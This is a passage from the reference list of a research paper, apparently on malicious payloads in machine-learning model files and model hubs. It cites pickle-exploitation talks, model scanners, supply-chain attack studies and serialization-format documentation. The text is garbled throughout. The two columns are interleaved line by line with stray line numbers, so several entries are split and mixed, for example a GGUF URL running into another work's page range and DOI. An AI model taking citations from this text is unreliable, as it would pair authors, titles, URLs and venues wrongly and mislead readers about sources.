1202 [19] GGML Developers. 2024. GGUF: GPT-Generated Unified Format. https://github. New York, NY, USA, 3288–3298. https://doi.org/10.1145/3534678.3539070 1260
com/ggerganov/ggml/blob/master/docs/gguf.md. Accessed: 2024-07-07. [41] Liandanxia. 2024. Liandanxia Model Hubs. https://liandanxia.com/models. Ac-
1203 cessed: 2024-07-06. 1261
[20] Wenbo Guo, Zhengzi Xu, Chengwei Liu, Cheng Huang, Yong Fang, and Yang
1204 Liu. 2023. An Empirical Study of Malicious Code In PyPI Ecosystem. In 2023 38th [42] Michael M McKerns, Leif Strand, Tim Sullivan, Alta Fang, and Michael AG Aivazis. 1262
1205 IEEE/ACM International Conference on Automated Software Engineering (ASE). 2012. Building a framework for predictive science. arXiv preprint arXiv:1202.1056 1263
IEEE, 166–177. (2012).
1206 [43] MessagePack Developers. 2024. MessagePack specification. https://github.com/ 1264
[21] H5PY. 2024. File objects. https://docs.h5py.org/en/stable/high/file.html. Accessed:
1207 2024-07-11. msgpack/msgpack/blob/master/spec.md. Accessed: 2024-07-07. 1265
[22] Jiayi Hua, Kailong Wang, Meizhen Wang, Guangdong Bai, Xiapu Luo, and Haoyu [44] MindScope. 2024. ModelScope Models. https://modelscope.cn/models. Accessed:
1208 1266
Wang. 2024. MalModel: Hiding Malicious Payload in Mobile Deep Learning 2024-07-06.
1209 [45] MindSpore. 2024. MindSpore Model Hubs. https://xihe.mindspore.cn/models. 1267
Models with Black-box Backdoor Attack. arXiv preprint arXiv:2401.02659 (2024).
1210 [23] Cheng Huang, Nannan Wang, Ziyan Wang, Siqi Sun, Lingzi Li, Junren Chen, Accessed: 2024-07-06. 1268
Qianchong Zhao, Jiaxuan Han, Zhen Yang, and Lei Shi. 2024. DONAPI: Malicious [46] mmaitre314. 2024. Picklescan. https://github.com/mmaitre314/picklescan. Ac-
1211 cessed: 2024-07-12. 1269
NPM Packages Detector using Behavior Sequence Knowledge Mapping. arXiv
1212 preprint arXiv:2403.08334 (2024). [47] ModelZoo. 2024. ModelZoo. https://modelzoo.co/. Accessed: 2024-07-06. 1270
1213 [24] Hugging Face. 2024. Dataset loading scripts. https://huggingface.co/docs/ [48] Nadav Noy. 2024. Legit discovers “AI Jacking” vulnerability in popular Hugging 1271
datasets/dataset_script. Accessed: 2024-07-10. Face AI platform. https://www.legitsecurity.com/blog/tens-of-thousands-of-
1214 developers-were-potentially-impacted-by-the-hugging-face-aijacking-attack. 1272
[25] Hugging Face. 2024. Hugging Face Hub API. https://huggingface.co/docs/
1215 huggingface_hub/v0.5.1/en/package_reference/hf_api. Accessed: 2024-07-12. Accessed: 2024-07-05. 1273
[26] Hugging Face. 2024. Hugging Face Models. https://huggingface.co/models. [49] NumPy Developers. 2024. numpy.save. https://numpy.org/doc/stable/reference/
1216 1274
Accessed: 2024-07-06. generated/numpy.save.html#numpy.save. Accessed: 2024-07-07.
1217 1275
1218 11 1276
Conference’17, July 2017, Washington, DC, USA Zhao et al.

1277 [50] NumPy Developers. 2024. numpy.savez. https://numpy.org/doc/stable/reference/ [69] Stack Overflow. 2020. How to list all used operations in TensorFlow Saved- 1335
1278 generated/numpy.savez.html. Accessed: 2024-07-07. Model? https://stackoverflow.com/questions/60154650/how-to-list-all-used- 1336
[51] NVIDIA. 2024. NVIDIA NGC Models. https://catalog.ngc.nvidia.com/models. operations-in-tensorflow-savedmodel. Accessed: 2024-07-11.
1279 Accessed: 2024-07-06. [70] Evan Sultanik. 2021. Never a Dill Moment: Exploiting Machine Learning Pickle 1337
1280 [52] Trail of Bits. 2021. Fickling. https://github.com/trailofbits/fickling. Accessed: Files. https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting- 1338
1281
2024-07-05. machine-learning-pickle-files/. Accessed: 2024-07-05. 1339
[53] Trail of Bits. 2024. List of ML file formats. https://github.com/trailofbits/ml-file- [71] SwanHub. 2024. SwanHub Models. https://swanhub.co/models. Accessed:
1282 formats. Accessed: 2024-07-07. 2024-07-06. 1340
1283 [54] Marc Ohm, Henrik Plate, Arnold Sykosch, and Michael Meier. 2020. Backstabber’s [72] TensorFlow. 2024. Checkpoint. https://www.tensorflow.org/guide/checkpoint. 1341
Knife Collection: A Review of Open Source Software Supply Chain Attacks. In Accessed: 2024-07-07.
1284 1342
Detection of Intrusions and Malware, and Vulnerability Assessment, Clémentine [73] TensorFlow. 2024. HDF5 format. https://www.tensorflow.org/tutorials/keras/
1285 Maurice, Leyla Bilge, Gianluca Stringhini, and Nuno Neves (Eds.). Springer save_and_load#hdf5_format. Accessed: 2024-07-07. 1343
1286 International Publishing, Cham, 23–43. [74] TensorFlow. 2024. SavedModel. https://www.tensorflow.org/guide/saved_model. 1344
[55] ONNX. 2024. ONNX Model Zoo. https://onnx.ai/models/. Accessed: 2024-07-06. Accessed: 2024-07-07.
1287 [56] ONNX Developers. 2024. ONNX: Serialization with protobuf. https://onnx.ai/ [75] TensorFlow. 2024. TensorFlow Lite. https://www.tensorflow.org/lite/guide. 1345
1288 onnx/intro/concepts.html#serialization-with-protobuf. Accessed: 2024-07-07. Accessed: 2024-07-07. 1346
1289
[57] OpenAI. 2024. ChatGPT. https://chat.openai.com. Accessed: 2024-07-05. [76] TensorFlow. 2024. tf.io.read_file. https://www.tensorflow.org/api_docs/python/ 1347
[58] OpenCSG. 2024. OpenCSG Models. https://opencsg.com/models. Accessed: tf/io/read_file. Accessed: 2024-07-11.
1290 2024-07-06. [77] TensorFlow. 2024. tf.io.write_file. https://www.tensorflow.org/api_docs/python/ 1348
1291 [59] OpenMMLab. 2024. OpenMMLab ModelZoo. https://platform.openmmlab.com/ tf/io/write_file. Accessed: 2024-07-11. 1349
modelzoo/. Accessed: 2024-07-06. [78] TensorFlow. 2024. Using TensorFlow securely. https://github.com/tensorflow/
1292 1350
[60] OWASP. 2024. OWASP Top 10 for Large Language Model Applications. https: tensorflow/security/policy. Accessed: 2024-07-08.
1293 //owasp.org/www-project-top-10-for-large-language-model-applications/. Ac- [79] Tom Bonner. 2023. Models are code: A deep dive into security risks in TensorFlow 1351
1294 cessed: 2024-07-05. and Keras. https://hiddenlayer.com/research/models-are-code/. Accessed: 2024- 1352
[61] PaddlePaddle. 2024. PaddlePaddle Model Hubs. https://aistudio.baidu.com/ 07-05.
1295 modelsoverview. Accessed: 2024-07-06. [80] VirusTotal. 2024. YARA. https://github.com/virustotal/yara. Accessed: 2024-07- 1353
1296 [62] ProtectAI. 2023. Model serialization attacks. https://github.com/protectai/ 12. 1354
1297
modelscan/blob/main/docs/model_serialization_attacks.md. Accessed: 2024-07- [81] Mary Walker and Adrian Wood. 2024. Confused Learning: Supply Chain 1355
07. Attacks through Machine Learning Models. https://i.blackhat.com/Asia-24/
1298 [63] ProtectAI. 2023. Modelscan. https://github.com/protectai/modelscan. Accessed: Presentations/Asia-24-Wood-Confused-Learning.pdf. Accessed: 2024-07-11. 1356
1299 2024-07-05. [82] Shenao Wang, Yanjie Zhao, Xinyi Hou, and Haoyu Wang. 2024. Large language 1357
[64] Python. 2024. JSON encoder and decoder. https://docs.python.org/3/library/json. model supply chain: A research agenda. arXiv preprint arXiv:2404.12736 (2024).
1300 1358
html. Accessed: 2024-07-07. [83] WiseModel. 2024. WiseModel. https://www.wisemodel.cn/models. Accessed:
1301 [65] Python. 2024. marshal: Internal Python object serialization. https://docs.python. 2024-07-06. 1359
1302 org/3/library/marshal.html. Accessed: 2024-07-07. [84] X. Zhang, Z. Zhang, S. Ji, and T. Wang. 2021. Trojaning Language Models 1360
[66] Python. 2024. Pickle: Python object serialization. https://docs.python.org/3/ for Fun and Profit. In 2021 IEEE European Symposium on Security and Privacy
1303 library/pickle.html. Accessed: 2024-07-05. (EuroS&P). IEEE Computer Society, Los Alamitos, CA, USA, 179–197. https: 1361
1304 [67] Python. 2024. Pickletools: Tools for pickle developers. https://docs.python.org/ //doi.org/10.1109/EuroSP51992.2021.00022 1362
3/library/pickletools.html. Accessed: 2024-07-11. [85] Peng Zhou. 2024. How to Make Hugging Face to Hug Worms: Discovering
1305 1363
[68] PyTorch. 2024. PyTorch. https://github.com/pytorch/pytorch. Accessed: 2024- and Exploiting Unsafe Pickle.loads over Pre-Trained Large Model Hubs.
1306 07-05. https://www.blackhat.com/asia-24/briefings/schedule/index.html#how-to- 1364
1307 make-hugging-face-to-hug-worms-discovering-and-exploiting-unsafe- 1365
pickleloads-over-pre-trained-large-model-hubs-36261. Accessed: 2024-07-05.
1308 1366
1309 1367
1310 1368
1311 1369
1312 1370
1313 1371
1314 1372
1315 1373
1316 1374
1317 1375
1318 1376
1319 1377
1320 1378
1321 1379
1322 1380
1323 1381
1324 1382
1325 1383
1326 1384
1327 1385
1328 1386
1329 1387
1330 1388
1331 1389
1332 1390
1333 1391
1334 12 1392

You might also like